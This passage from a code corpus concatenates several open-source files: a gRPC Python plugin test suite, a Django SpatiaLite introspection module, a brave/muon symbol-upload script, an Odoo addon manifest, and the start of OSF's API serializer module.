    add_servicer(Servicer(), server)
    port = server.add_insecure_port('[::]:0')
    server.start()
    channel = grpc.insecure_channel('localhost:{}'.format(port))
    stub = getattr(service_pb2_grpc, STUB_IDENTIFIER)(channel)
    return _Service(None, server, stub)
def _streaming_input_request_iterator():
    """Yield three identical requests carrying a one-byte payload each."""
    for _ in range(3):
        req = request_pb2.StreamingInputCallRequest()
        req.payload.payload_type = payload_pb2.COMPRESSABLE
        req.payload.payload_compressable = 'a'
        yield req
def _streaming_output_request():
    """Build a request asking for three responses of sizes 1, 2 and 3."""
    request = request_pb2.StreamingOutputCallRequest()
    for size in (1, 2, 3):
        request.response_parameters.add(size=size, interval_us=0)
    return request
def _full_duplex_request_iterator():
    """Yield two requests: one asking for one response, one asking for two."""
    first = request_pb2.StreamingOutputCallRequest()
    first.response_parameters.add(size=1, interval_us=0)
    yield first
    second = request_pb2.StreamingOutputCallRequest()
    second.response_parameters.add(size=2, interval_us=0)
    second.response_parameters.add(size=3, interval_us=0)
    yield second
class PythonPluginTest(unittest.TestCase):
    """Test case for the gRPC Python protoc-plugin.

    While reading these tests, remember that the futures API
    (`stub.method.future()`) only gives futures for the *response-unary*
    methods and does not exist for response-streaming methods.
    """

    def testImportAttributes(self):
        # check that we can access the generated module and its members.
        self.assertIsNotNone(getattr(service_pb2_grpc, STUB_IDENTIFIER, None))
        self.assertIsNotNone(
            getattr(service_pb2_grpc, SERVICER_IDENTIFIER, None))
        self.assertIsNotNone(
            getattr(service_pb2_grpc, ADD_SERVICER_TO_SERVER_IDENTIFIER, None))

    def testUpDown(self):
        service = _CreateService()
        self.assertIsNotNone(service.servicer_methods)
        self.assertIsNotNone(service.server)
        self.assertIsNotNone(service.stub)
        service.server.stop(None)

    def testIncompleteServicer(self):
        # A servicer with no methods must answer UNIMPLEMENTED.
        service = _CreateIncompleteService()
        request = request_pb2.SimpleRequest(response_size=13)
        with self.assertRaises(grpc.RpcError) as exception_context:
            service.stub.UnaryCall(request)
        self.assertIs(exception_context.exception.code(),
                      grpc.StatusCode.UNIMPLEMENTED)
        service.server.stop(None)

    def testUnaryCall(self):
        service = _CreateService()
        request = request_pb2.SimpleRequest(response_size=13)
        response = service.stub.UnaryCall(request)
        expected_response = service.servicer_methods.UnaryCall(
            request, 'not a real context!')
        self.assertEqual(expected_response, response)
        service.server.stop(None)

    def testUnaryCallFuture(self):
        service = _CreateService()
        request = request_pb2.SimpleRequest(response_size=13)
        # Check that the call does not block waiting for the server to respond.
        with service.servicer_methods.pause():
            response_future = service.stub.UnaryCall.future(request)
        response = response_future.result()
        expected_response = service.servicer_methods.UnaryCall(
            request, 'not a real RpcContext!')
        self.assertEqual(expected_response, response)
        service.server.stop(None)

    def testUnaryCallFutureExpired(self):
        service = _CreateService()
        request = request_pb2.SimpleRequest(response_size=13)
        with service.servicer_methods.pause():
            response_future = service.stub.UnaryCall.future(
                request, timeout=test_constants.SHORT_TIMEOUT)
            with self.assertRaises(grpc.RpcError) as exception_context:
                response_future.result()
        self.assertIs(exception_context.exception.code(),
                      grpc.StatusCode.DEADLINE_EXCEEDED)
        self.assertIs(response_future.code(), grpc.StatusCode.DEADLINE_EXCEEDED)
        service.server.stop(None)

    def testUnaryCallFutureCancelled(self):
        service = _CreateService()
        request = request_pb2.SimpleRequest(response_size=13)
        with service.servicer_methods.pause():
            response_future = service.stub.UnaryCall.future(request)
            response_future.cancel()
        self.assertTrue(response_future.cancelled())
        self.assertIs(response_future.code(), grpc.StatusCode.CANCELLED)
        service.server.stop(None)

    def testUnaryCallFutureFailed(self):
        service = _CreateService()
        request = request_pb2.SimpleRequest(response_size=13)
        with service.servicer_methods.fail():
            response_future = service.stub.UnaryCall.future(request)
            self.assertIsNotNone(response_future.exception())
        self.assertIs(response_future.code(), grpc.StatusCode.UNKNOWN)
        service.server.stop(None)

    def testStreamingOutputCall(self):
        service = _CreateService()
        request = _streaming_output_request()
        responses = service.stub.StreamingOutputCall(request)
        expected_responses = service.servicer_methods.StreamingOutputCall(
            request, 'not a real RpcContext!')
        for expected_response, response in moves.zip_longest(
                expected_responses, responses):
            self.assertEqual(expected_response, response)
        service.server.stop(None)

    def testStreamingOutputCallExpired(self):
        service = _CreateService()
        request = _streaming_output_request()
        with service.servicer_methods.pause():
            responses = service.stub.StreamingOutputCall(
                request, timeout=test_constants.SHORT_TIMEOUT)
            with self.assertRaises(grpc.RpcError) as exception_context:
                list(responses)
        self.assertIs(exception_context.exception.code(),
                      grpc.StatusCode.DEADLINE_EXCEEDED)
        service.server.stop(None)

    def testStreamingOutputCallCancelled(self):
        service = _CreateService()
        request = _streaming_output_request()
        responses = service.stub.StreamingOutputCall(request)
        next(responses)
        responses.cancel()
        with self.assertRaises(grpc.RpcError) as exception_context:
            next(responses)
        self.assertIs(responses.code(), grpc.StatusCode.CANCELLED)
        service.server.stop(None)

    def testStreamingOutputCallFailed(self):
        service = _CreateService()
        request = _streaming_output_request()
        with service.servicer_methods.fail():
            responses = service.stub.StreamingOutputCall(request)
            self.assertIsNotNone(responses)
            with self.assertRaises(grpc.RpcError) as exception_context:
                next(responses)
            self.assertIs(exception_context.exception.code(),
                          grpc.StatusCode.UNKNOWN)
        service.server.stop(None)

    def testStreamingInputCall(self):
        service = _CreateService()
        response = service.stub.StreamingInputCall(
            _streaming_input_request_iterator())
        expected_response = service.servicer_methods.StreamingInputCall(
            _streaming_input_request_iterator(), 'not a real RpcContext!')
        self.assertEqual(expected_response, response)
        service.server.stop(None)

    def testStreamingInputCallFuture(self):
        service = _CreateService()
        with service.servicer_methods.pause():
            response_future = service.stub.StreamingInputCall.future(
                _streaming_input_request_iterator())
        response = response_future.result()
        expected_response = service.servicer_methods.StreamingInputCall(
            _streaming_input_request_iterator(), 'not a real RpcContext!')
        self.assertEqual(expected_response, response)
        service.server.stop(None)

    def testStreamingInputCallFutureExpired(self):
        service = _CreateService()
        with service.servicer_methods.pause():
            response_future = service.stub.StreamingInputCall.future(
                _streaming_input_request_iterator(),
                timeout=test_constants.SHORT_TIMEOUT)
            with self.assertRaises(grpc.RpcError) as exception_context:
                response_future.result()
            self.assertIsInstance(response_future.exception(), grpc.RpcError)
            self.assertIs(response_future.exception().code(),
                          grpc.StatusCode.DEADLINE_EXCEEDED)
        self.assertIs(exception_context.exception.code(),
                      grpc.StatusCode.DEADLINE_EXCEEDED)
        service.server.stop(None)

    def testStreamingInputCallFutureCancelled(self):
        service = _CreateService()
        with service.servicer_methods.pause():
            response_future = service.stub.StreamingInputCall.future(
                _streaming_input_request_iterator())
            response_future.cancel()
        self.assertTrue(response_future.cancelled())
        with self.assertRaises(grpc.FutureCancelledError):
            response_future.result()
        service.server.stop(None)

    def testStreamingInputCallFutureFailed(self):
        service = _CreateService()
        with service.servicer_methods.fail():
            response_future = service.stub.StreamingInputCall.future(
                _streaming_input_request_iterator())
            self.assertIsNotNone(response_future.exception())
        self.assertIs(response_future.code(), grpc.StatusCode.UNKNOWN)
        service.server.stop(None)

    def testFullDuplexCall(self):
        service = _CreateService()
        responses = service.stub.FullDuplexCall(_full_duplex_request_iterator())
        expected_responses = service.servicer_methods.FullDuplexCall(
            _full_duplex_request_iterator(), 'not a real RpcContext!')
        for expected_response, response in moves.zip_longest(
                expected_responses, responses):
            self.assertEqual(expected_response, response)
        service.server.stop(None)

    def testFullDuplexCallExpired(self):
        request_iterator = _full_duplex_request_iterator()
        service = _CreateService()
        with service.servicer_methods.pause():
            responses = service.stub.FullDuplexCall(
                request_iterator, timeout=test_constants.SHORT_TIMEOUT)
            with self.assertRaises(grpc.RpcError) as exception_context:
                list(responses)
        self.assertIs(exception_context.exception.code(),
                      grpc.StatusCode.DEADLINE_EXCEEDED)
        service.server.stop(None)

    def testFullDuplexCallCancelled(self):
        service = _CreateService()
        request_iterator = _full_duplex_request_iterator()
        responses = service.stub.FullDuplexCall(request_iterator)
        next(responses)
        responses.cancel()
        with self.assertRaises(grpc.RpcError) as exception_context:
            next(responses)
        self.assertIs(exception_context.exception.code(),
                      grpc.StatusCode.CANCELLED)
        service.server.stop(None)

    def testFullDuplexCallFailed(self):
        request_iterator = _full_duplex_request_iterator()
        service = _CreateService()
        with service.servicer_methods.fail():
            responses = service.stub.FullDuplexCall(request_iterator)
            with self.assertRaises(grpc.RpcError) as exception_context:
                next(responses)
            self.assertIs(exception_context.exception.code(),
                          grpc.StatusCode.UNKNOWN)
        service.server.stop(None)

    def testHalfDuplexCall(self):
        service = _CreateService()

        def half_duplex_request_iterator():
            request = request_pb2.StreamingOutputCallRequest()
            request.response_parameters.add(size=1, interval_us=0)
            yield request
            request = request_pb2.StreamingOutputCallRequest()
            request.response_parameters.add(size=2, interval_us=0)
            request.response_parameters.add(size=3, interval_us=0)
            yield request

        responses = service.stub.HalfDuplexCall(half_duplex_request_iterator())
        expected_responses = service.servicer_methods.HalfDuplexCall(
            half_duplex_request_iterator(), 'not a real RpcContext!')
        for expected_response, response in moves.zip_longest(
                expected_responses, responses):
            self.assertEqual(expected_response, response)
        service.server.stop(None)

    def testHalfDuplexCallWedged(self):
        condition = threading.Condition()
        wait_cell = [False]

        @contextlib.contextmanager
        def wait():  # pylint: disable=invalid-name
            # Where's Python 3's 'nonlocal' statement when you need it?
            with condition:
                wait_cell[0] = True
            yield
            with condition:
                wait_cell[0] = False
                condition.notify_all()

        def half_duplex_request_iterator():
            request = request_pb2.StreamingOutputCallRequest()
            request.response_parameters.add(size=1, interval_us=0)
            yield request
            # Block here until wait() exits, wedging the request stream.
            with condition:
                while wait_cell[0]:
                    condition.wait()

        service = _CreateService()
        with wait():
            responses = service.stub.HalfDuplexCall(
                half_duplex_request_iterator(),
                timeout=test_constants.SHORT_TIMEOUT)
            # half-duplex waits for the client to send all info
            with self.assertRaises(grpc.RpcError) as exception_context:
                next(responses)
        self.assertIs(exception_context.exception.code(),
                      grpc.StatusCode.DEADLINE_EXCEEDED)
        service.server.stop(None)
# Allow running this test module directly, outside a test runner.
if __name__ == '__main__':
    unittest.main(verbosity=2)
| apache-2.0 |
sidmitra/django_nonrel_testapp | django/contrib/gis/db/backends/spatialite/introspection.py | 401 | 2112 | from django.contrib.gis.gdal import OGRGeomType
from django.db.backends.sqlite3.introspection import DatabaseIntrospection, FlexibleFieldLookupDict
class GeoFlexibleFieldLookupDict(FlexibleFieldLookupDict):
    """
    Subclass that extends the `base_data_types_reverse` dict with the
    geometry field types, mapping each OGC geometry type name to
    'GeometryField'.
    """
    base_data_types_reverse = FlexibleFieldLookupDict.base_data_types_reverse.copy()
    base_data_types_reverse.update(
        dict.fromkeys(
            ('point', 'linestring', 'polygon', 'multipoint',
             'multilinestring', 'multipolygon', 'geometrycollection'),
            'GeometryField',
        )
    )
class SpatiaLiteIntrospection(DatabaseIntrospection):
    # Use the geometry-aware lookup dict so introspection can map SpatiaLite
    # geometry columns to Django GeometryFields.
    data_types_reverse = GeoFlexibleFieldLookupDict()

    def get_geometry_type(self, table_name, geo_col):
        """Return (field_type, field_params) for the geometry column
        ``geo_col`` of ``table_name``, using SpatiaLite's
        ``geometry_columns`` metadata table.
        """
        cursor = self.connection.cursor()
        try:
            # Querying the `geometry_columns` table to get additional metadata.
            cursor.execute('SELECT "coord_dimension", "srid", "type" '
                           'FROM "geometry_columns" '
                           'WHERE "f_table_name"=%s AND "f_geometry_column"=%s',
                           (table_name, geo_col))
            row = cursor.fetchone()
            if not row:
                raise Exception('Could not find a geometry column for "%s"."%s"' %
                                (table_name, geo_col))
            # OGRGeomType does not require GDAL and makes it easy to convert
            # from OGC geom type name to Django field.
            field_type = OGRGeomType(row[2]).django
            # Getting any GeometryField keyword arguments that are not the default.
            dim = row[0]
            srid = row[1]
            field_params = {}
            if srid != 4326:
                field_params['srid'] = srid
            # NOTE(review): `basestring` marks this as Python 2 code; a
            # string dimension like 'XYZ' signals a 3D geometry.
            if isinstance(dim, basestring) and 'Z' in dim:
                field_params['dim'] = 3
        finally:
            # Always release the cursor, even when the lookup fails.
            cursor.close()
        return field_type, field_params
| bsd-3-clause |
brave/muon | script/upload-windows-pdb.py | 2 | 1160 | #!/usr/bin/env python
import os
import glob
import sys
from lib.config import s3_config
from lib.util import electron_gyp, execute, rm_rf, safe_mkdir, s3put
# Absolute path to the repository root (two levels above this script).
SOURCE_ROOT = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
# Windows-style relative paths used while staging and downloading symbols.
SYMBOLS_DIR = 'dist\\symbols'
DOWNLOAD_DIR = 'vendor\\brightray\\vendor\\download\\libchromiumcontent'
# Project/product names come from the gyp configuration.
PROJECT_NAME = electron_gyp()['project_name%']
PRODUCT_NAME = electron_gyp()['product_name%']
# PDB files whose debug symbols should be stored and uploaded.
PDB_LIST = [
    'out\\R\\{0}.exe.pdb'.format(PROJECT_NAME),
]
def main():
    """Stage PDB debug symbols with symstore and upload them to S3."""
    os.chdir(SOURCE_ROOT)
    # Start from a clean symbols directory.
    rm_rf(SYMBOLS_DIR)
    safe_mkdir(SYMBOLS_DIR)
    for pdb in PDB_LIST:
        run_symstore(pdb, SYMBOLS_DIR, PRODUCT_NAME)
    bucket, access_key, secret_key = s3_config()
    # S3 keys are case-sensitive; symbol servers expect lowercase paths.
    pdb_files = [path.lower()
                 for path in glob.glob(SYMBOLS_DIR + '/*.pdb/*/*.pdb')]
    upload_symbols(bucket, access_key, secret_key, pdb_files)
def run_symstore(pdb, dest, product):
    """Register *pdb* in the symbol store at *dest* under *product*."""
    execute(['symstore', 'add', '/r', '/f', pdb, '/s', dest, '/t', product])
def upload_symbols(bucket, access_key, secret_key, files):
    """Upload the staged symbol *files* to the atom-shell/symbols S3 prefix."""
    s3put(bucket, access_key, secret_key, SYMBOLS_DIR, 'atom-shell/symbols',
          files)
if __name__ == '__main__':
sys.exit(main())
| mit |
damdam-s/bank-statement-reconcile | __unported__/account_advanced_reconcile_transaction_ref/__openerp__.py | 14 | 1575 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Romain Deheele. Copyright Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# OpenERP/Odoo addon manifest: a metadata dictionary read by the server at
# module-discovery time; it contains data only, no executable logic.
{'name': 'Advanced Reconcile Transaction Ref',
 'description': """
Advanced reconciliation method for the module account_advanced_reconcile
========================================================================
Reconcile rules with transaction_ref
""",
 'version': '1.0.1',
 'author': "Camptocamp,Odoo Community Association (OCA)",
 'category': 'Finance',
 'website': 'http://www.camptocamp.com',
 'license': 'AGPL-3',
 'depends': ['account_advanced_reconcile'],
 'data': ['easy_reconcile_view.xml'],
 'demo': [],
 'test': [],  # To be ported or migrate to unit tests or scenarios
 'auto_install': False,
 'installable': False,
 'images': []
 }
| agpl-3.0 |
mfraezz/osf.io | api/base/serializers.py | 2 | 70134 | import collections
import re
from future.moves.urllib.parse import urlparse
import furl
from django.core.urlresolvers import resolve, reverse, NoReverseMatch
from django.core.exceptions import ImproperlyConfigured
from distutils.version import StrictVersion
from rest_framework import exceptions, permissions
from rest_framework import serializers as ser
from rest_framework.fields import SkipField
from rest_framework.fields import get_attribute as get_nested_attributes
from rest_framework.mixins import RetrieveModelMixin
from api.base import utils
from osf.utils import permissions as osf_permissions
from osf.utils import sanitize
from osf.utils import functional
from api.base import exceptions as api_exceptions
from api.base.settings import BULK_SETTINGS
from framework.auth import core as auth_core
from osf.models import AbstractNode, MaintenanceState, Preprint
from website import settings
from website.project.model import has_anonymous_link
from api.base.versioning import KEBAB_CASE_VERSION, get_kebab_snake_case_field
def get_meta_type(serializer_class, request):
    """Return the JSON-API resource type declared on a serializer's Meta.

    Resolution order: ``Meta.type_`` when set, otherwise
    ``Meta.get_type(request)``. Returns None when the serializer has no
    Meta, or when neither attribute is available.
    """
    meta = getattr(serializer_class, 'Meta', None)
    if meta is None:
        return None
    static_type = getattr(meta, 'type_', None)
    if static_type is not None:
        return static_type
    # Fall back to the dynamic, request-aware type. The AttributeError
    # guard deliberately covers both a missing get_type and attribute
    # errors raised inside it.
    try:
        return meta.get_type(request)
    except AttributeError:
        return None
def format_relationship_links(related_link=None, self_link=None, rel_meta=None, self_meta=None):
    """
    Properly handles formatting of self and related links according to JSON API.
    Removes related or self link, if none.
    """
    links = {}
    if related_link:
        links['related'] = {
            'href': related_link or {},
            'meta': rel_meta or {},
        }
    if self_link:
        links['self'] = {
            'href': self_link or {},
            'meta': self_meta or {},
        }
    return {'links': links}
def is_anonymized(request):
    """Return whether this request uses an anonymized view-only link.

    The result is cached on the request object (``_is_anonymized``) so the
    private-key check runs at most once per request.
    """
    try:
        return request._is_anonymized
    except AttributeError:
        pass
    private_key = request.query_params.get('view_only', None)
    request._is_anonymized = osf_permissions.check_private_key_for_anonymized_link(private_key)
    return request._is_anonymized
class ConditionalField(ser.Field):
    """
    Skips the inner field based on `should_show` or `should_hide`; override whichever makes the logic more readable.
    If you'd prefer to return `None` rather skipping the field, override `should_be_none` as well.
    """

    def __init__(self, field, **kwargs):
        super(ConditionalField, self).__init__(**kwargs)
        # Unwrap many-relation fields to their child relation so the inner
        # field is always a single-value field.
        self.field = getattr(field, 'child_relation', field)
        # source is intentionally field.source and not self.field.source
        self.source = field.source
        # Mirror the inner field's flags so DRF validation behaves the same.
        self.required = self.field.required
        self.read_only = self.field.read_only

    def should_show(self, instance):
        """Default visibility: the inverse of should_hide()."""
        return not self.should_hide(instance)

    def should_hide(self, instance):
        # Subclasses must override at least one of should_show/should_hide.
        raise NotImplementedError()

    def should_be_none(self, instance):
        """When hidden: return None instead of skipping if this is True."""
        return False

    def get_attribute(self, instance):
        # Hidden fields either serialize as None or are skipped entirely.
        if not self.should_show(instance):
            if self.should_be_none(instance):
                return None
            raise SkipField
        return self.field.get_attribute(instance)

    def bind(self, field_name, parent):
        # Bind both this wrapper and the wrapped field into the serializer.
        super(ConditionalField, self).bind(field_name, parent)
        self.field.bind(field_name, self)

    def to_representation(self, value):
        # Re-parent the inner field so URL/context resolution works whether
        # the root serializer is a list serializer (has .child) or not.
        if getattr(self.field.root, 'child', None):
            self.field.parent = self.field.root.child
        else:
            self.field.parent = self.field.root
        return self.field.to_representation(value)

    def to_esi_representation(self, value, envelope='data'):
        # Same re-parenting dance as to_representation, for ESI rendering.
        if getattr(self.field.root, 'child', None):
            self.field.parent = self.field.root.child
        else:
            self.field.parent = self.field.root
        return self.field.to_esi_representation(value, envelope)

    def to_internal_value(self, data):
        # Writes are delegated straight to the wrapped field.
        return self.field.to_internal_value(data)
class ShowIfVersion(ConditionalField):
    """
    Skips the field if the specified request version is not after a feature's earliest supported version,
    or not before the feature's latest supported version.
    """
    def __init__(self, field, min_version=None, max_version=None, **kwargs):
        super(ShowIfVersion, self).__init__(field, **kwargs)
        self.min_version = min_version
        self.max_version = max_version
        # Honor an explicitly supplied help_text, falling back to a generated
        # deprecation notice. (The original expression
        # `'...'.format(...) or kwargs.get('help_text')` could never use the
        # kwarg, because the formatted string is always truthy.)
        self.help_text = kwargs.get('help_text') or 'This field is deprecated as of version {}'.format(self.max_version)
    def should_hide(self, instance):
        # Hide when the request's version is outside [min_version, max_version].
        request = self.context.get('request')
        return request and utils.is_deprecated(request.version, self.min_version, self.max_version)
class ShowIfCurrentUser(ConditionalField):
    """Show the field only when the serialized instance is the requesting user."""
    def should_show(self, instance):
        # `instance` is a user object here; compare against the authenticated user.
        request = self.context.get('request')
        return request and request.user == instance
class ShowIfAdminScopeOrAnonymous(ConditionalField):
    """Show the field only to anonymous users or requests carrying an admin scope."""
    def should_show(self, instance):
        request = self.context.get('request')
        # Prefer a precomputed flag on the instance; otherwise check the request's scopes.
        if hasattr(instance, 'has_admin_scope'):
            admin_scope = instance.has_admin_scope
        else:
            admin_scope = utils.has_admin_scope(request)
        return request and (request.user.is_anonymous or admin_scope)
class HideIfRegistration(ConditionalField):
    """
    If node is a registration, this field will return None.
    """
    def should_hide(self, instance):
        return instance.is_registration
    def should_be_none(self, instance):
        # Attribute fields render as None; RelationshipFields are omitted entirely.
        return not isinstance(self.field, RelationshipField)
class HideIfDisabled(ConditionalField):
    """
    If the user is disabled, returns None for attribute fields, or skips
    if a RelationshipField.
    """
    def should_hide(self, instance):
        return instance.is_disabled
    def should_be_none(self, instance):
        # Attribute fields render as None; RelationshipFields are omitted entirely.
        return not isinstance(self.field, RelationshipField)
class HideIfPreprint(ConditionalField):
    """
    If object is a preprint or related to a preprint, hide the field.
    """
    def should_hide(self, instance):
        # Sometimes a "node" might be a preprint object where node/preprint code is shared.
        node_attr = getattr(instance, 'node', False)
        if node_attr and isinstance(node_attr, Preprint):
            return True
        if isinstance(instance, Preprint):
            return True
        if isinstance(getattr(instance, 'target', None), Preprint):
            return True
        return isinstance(getattr(instance, 'preprint', False), Preprint)
    def should_be_none(self, instance):
        # Attribute fields render as None; RelationshipFields are omitted entirely.
        return not isinstance(self.field, RelationshipField)
class NoneIfWithdrawal(ConditionalField):
    """
    If preprint is withdrawn, this field (attribute or relationship) should return None instead of hidden.
    """
    def should_hide(self, instance):
        # `is_retracted` is the withdrawal flag on the instance.
        return instance.is_retracted
    def should_be_none(self, instance):
        # Always render None rather than omitting the field.
        return True
class HideIfWithdrawal(ConditionalField):
    """
    If registration is withdrawn, this field will return None.
    """
    def should_hide(self, instance):
        return instance.is_retracted
    def should_be_none(self, instance):
        # Attribute fields render as None; RelationshipFields are omitted entirely.
        return not isinstance(self.field, RelationshipField)
class HideIfNotWithdrawal(ConditionalField):
    """Show the field only for withdrawn (retracted) instances."""
    def should_hide(self, instance):
        return not instance.is_retracted
class HideIfWikiDisabled(ConditionalField):
    """
    If wiki is disabled, don't show relationship field; only available on version 2.8 and later.
    """
    def should_hide(self, instance):
        request = self.context.get('request')
        # Prefer a precomputed flag; otherwise ask the node's addon registry.
        if hasattr(instance, 'has_wiki_addon'):
            wiki_enabled = instance.has_wiki_addon
        else:
            wiki_enabled = instance.has_addon('wiki')
        return not utils.is_deprecated(request.version, min_version='2.8') and not wiki_enabled
class HideIfNotNodePointerLog(ConditionalField):
    """
    This field will not be shown if the log is not a pointer log for a node.
    """
    def should_hide(self, instance):
        pointer = instance.params.get('pointer', False)
        if not pointer:
            return True
        pointed = AbstractNode.load(pointer['id'])
        if not pointed:
            return True
        # Hide unless the pointed-at object is a plain node.
        return pointed.type != 'osf.node'
class HideIfNotRegistrationPointerLog(ConditionalField):
    """
    This field will not be shown if the log is not a pointer log for a registration.
    """
    def should_hide(self, instance):
        pointer = instance.params.get('pointer', False)
        if not pointer:
            return True
        pointed = AbstractNode.load(pointer['id'])
        if not pointed:
            return True
        # Hide unless the pointed-at object is a registration.
        return pointed.type != 'osf.registration'
class HideIfProviderCommentsAnonymous(ConditionalField):
    """
    If the action's provider has anonymous comments and the user does not have `view_actions`
    permission on the provider, hide the field.
    """
    def should_hide(self, instance):
        request = self.context.get('request')
        auth = utils.get_user_auth(request)
        if not auth.logged_in:
            return True
        provider = instance.target.provider
        # Show when comments are explicitly non-anonymous, or the user can moderate.
        if provider.reviews_comments_anonymous is False:
            return False
        return not auth.user.has_perm('view_actions', provider)
class HideIfProviderCommentsPrivate(ConditionalField):
    """
    If the action's provider has private comments and the user does not have `view_actions`
    permission on the provider, hide the field.
    """
    def should_hide(self, instance):
        request = self.context.get('request')
        auth = utils.get_user_auth(request)
        if not auth.logged_in:
            return True
        provider = instance.target.provider
        # Show when comments are explicitly non-private, or the user can moderate.
        if provider.reviews_comments_private is False:
            return False
        return not auth.user.has_perm('view_actions', provider)
class AllowMissing(ser.Field):
    """Wrapper field that serializes to an empty string when the wrapped field's value is absent."""
    def __init__(self, field, **kwargs):
        super(AllowMissing, self).__init__(**kwargs)
        # The wrapped field; all serialization is delegated to it.
        self.field = field
    def to_representation(self, value):
        return self.field.to_representation(value)
    def bind(self, field_name, parent):
        super(AllowMissing, self).bind(field_name, parent)
        # Bind the wrapped field through this wrapper so its context chain resolves.
        self.field.bind(field_name, self)
    def get_attribute(self, instance):
        """
        Overwrite the error behavior to return a blank value if there is no existing value.
        This allows the display of keys that do not exist in the DB (GitHub on a new OSF account, for example.)
        """
        try:
            return self.field.get_attribute(instance)
        except SkipField:
            return ''
    def to_internal_value(self, data):
        return self.field.to_internal_value(data)
def _url_val(val, obj, serializer, request, **kwargs):
    """Function applied by `HyperlinksField` to get the correct value in the
    schema.

    `val` may be a `Link` (reverse-resolved), a string (treated as the name of
    a serializer method called with `obj`), or a literal value.
    Raises SkipField for falsy results, except the integer 0.
    """
    if isinstance(val, Link):  # If a Link is passed, get the url value
        url = val.resolve_url(obj, request)
    elif isinstance(val, str):  # if a string is passed, it's a method of the serializer
        target = serializer
        if getattr(target, 'field', None):
            # Unwrap field wrappers so the method is looked up on the real serializer.
            target = target.parent
        url = getattr(target, val)(obj) if obj is not None else None
    else:
        url = val
    if url or url == 0:
        return url
    raise SkipField
class VersionedDateTimeField(ser.DateTimeField):
    """
    Custom DateTimeField that forces dates into the ISO-8601 format with timezone information in version 2.2.
    """
    def to_representation(self, value):
        request = self.context.get('request')
        if request:
            if StrictVersion(request.version) >= '2.2':
                # 2.2+ always renders microseconds plus an explicit UTC 'Z'.
                self.format = '%Y-%m-%dT%H:%M:%S.%fZ'
            elif value.microsecond:
                self.format = '%Y-%m-%dT%H:%M:%S.%f'
            else:
                self.format = '%Y-%m-%dT%H:%M:%S'
        return super(VersionedDateTimeField, self).to_representation(value)
class IDField(ser.CharField):
    """
    ID field that validates that 'id' in the request body is the same as the instance 'id' for single requests.
    """
    def __init__(self, **kwargs):
        kwargs['label'] = 'ID'
        super(IDField, self).__init__(**kwargs)
    # Overrides CharField
    def to_internal_value(self, data):
        # On single (non-bulk) updates, the body's id must match the URL's id;
        # a mismatch is a 409 Conflict.
        request = self.context.get('request')
        if request:
            if request.method in utils.UPDATE_METHODS and not utils.is_bulk_request(request):
                id_field = self.get_id(self.root.instance)
                if id_field != data:
                    raise api_exceptions.Conflict(detail=('The id you used in the URL, "{}", does not match the id you used in the json body\'s id field, "{}". The object "{}" exists, otherwise you\'d get a 404, so most likely you need to change the id field to match.'.format(id_field, data, id_field)))
        return super(IDField, self).to_internal_value(data)
    def get_id(self, obj):
        # NOTE(review): the third argument makes the literal string '_id' the
        # *default return value* when `obj` lacks the `self.source` attribute;
        # presumably a fallback attribute lookup was intended — confirm before changing.
        return getattr(obj, self.source, '_id')
class TypeField(ser.CharField):
    """
    Type field that validates that 'type' in the request body is the same as the Meta type.
    Also ensures that type is write-only and required.
    """
    def __init__(self, **kwargs):
        # 'type' must always be supplied by clients but is never serialized back out.
        kwargs['write_only'] = True
        kwargs['required'] = True
        super(TypeField, self).__init__(**kwargs)
    # Overrides CharField
    def to_internal_value(self, data):
        """Validate the body's 'type' against the serializer's Meta type.

        The legacy snake_case spelling of a kebab-case type is accepted with a
        deprecation warning; any other mismatch raises a 409 Conflict.
        """
        request = self.context.get('request', None)
        if isinstance(self.root, JSONAPIListSerializer):
            type_ = get_meta_type(self.root.child, request)
        else:
            type_ = get_meta_type(self.root, request)
        # `type_` is the canonical kebab-case type; this is its legacy
        # snake_case spelling. (The original misleadingly named this
        # variable `kebab_case` even though it holds the snake_case form.)
        snake_case = str(type_).replace('-', '_')
        if type_ != data and snake_case == data:
            type_ = snake_case
            self.context['request'].META.setdefault('warning', 'As of API Version {0}, all types are now Kebab-case. {0} will accept snake_case, but this will be deprecated in future versions.'.format(KEBAB_CASE_VERSION))
        elif type_ != data:
            raise api_exceptions.Conflict(detail=('This resource has a type of "{}", but you set the json body\'s type field to "{}". You probably need to change the type field to match the resource\'s type.'.format(type_, data)))
        return super(TypeField, self).to_internal_value(data)
class TargetTypeField(ser.CharField):
    """
    Enforces that the related resource carries the expected JSON API type.
    Always write-only and required: clients must declare the target's type.
    """
    def __init__(self, **kwargs):
        kwargs['write_only'] = True
        kwargs['required'] = True
        # The single acceptable value for this field.
        self.target_type = kwargs.pop('target_type')
        super(TargetTypeField, self).__init__(**kwargs)
    def to_internal_value(self, data):
        if data != self.target_type:
            raise api_exceptions.Conflict(detail=('The target resource has a type of "{}", but you set the json body\'s type field to "{}". You probably need to change the type field to match the target resource\'s type.'.format(self.target_type, data)))
        return super(TargetTypeField, self).to_internal_value(data)
class JSONAPIListField(ser.ListField):
    """ListField that rejects any payload which is not a JSON array."""
    def to_internal_value(self, data):
        if isinstance(data, list):
            return super(JSONAPIListField, self).to_internal_value(data)
        # `fail` raises a ValidationError with the 'not_a_list' message.
        self.fail('not_a_list', input_type=type(data).__name__)
class ValuesListField(JSONAPIListField):
    """
    JSONAPIListField that serializes a queryset through ``values_list(attr, flat=True)``,
    returning just an array of the specified field (attr_name) for optimization purposes.
    """
    def __init__(self, **kwargs):
        # Name of the single column to pull from the queryset.
        self.attr_name = kwargs.pop('attr_name')
        super(ValuesListField, self).__init__(**kwargs)
    def to_representation(self, queryset):
        # Let the database return only the requested column.
        return queryset.values_list(self.attr_name, flat=True)
class AuthorizedCharField(ser.CharField):
    """
    Passes auth of the logged-in user to the object's method
    defined as the field source.
    Example:
        content = AuthorizedCharField(source='get_content')
    """
    def __init__(self, source, **kwargs):
        self.source = source
        super(AuthorizedCharField, self).__init__(source=self.source, **kwargs)
    def get_attribute(self, obj):
        # Build an Auth for the requesting user and hand it to the source method.
        auth = auth_core.Auth(self.context['request'].user)
        source_method = getattr(obj, self.source)
        return source_method(auth=auth)
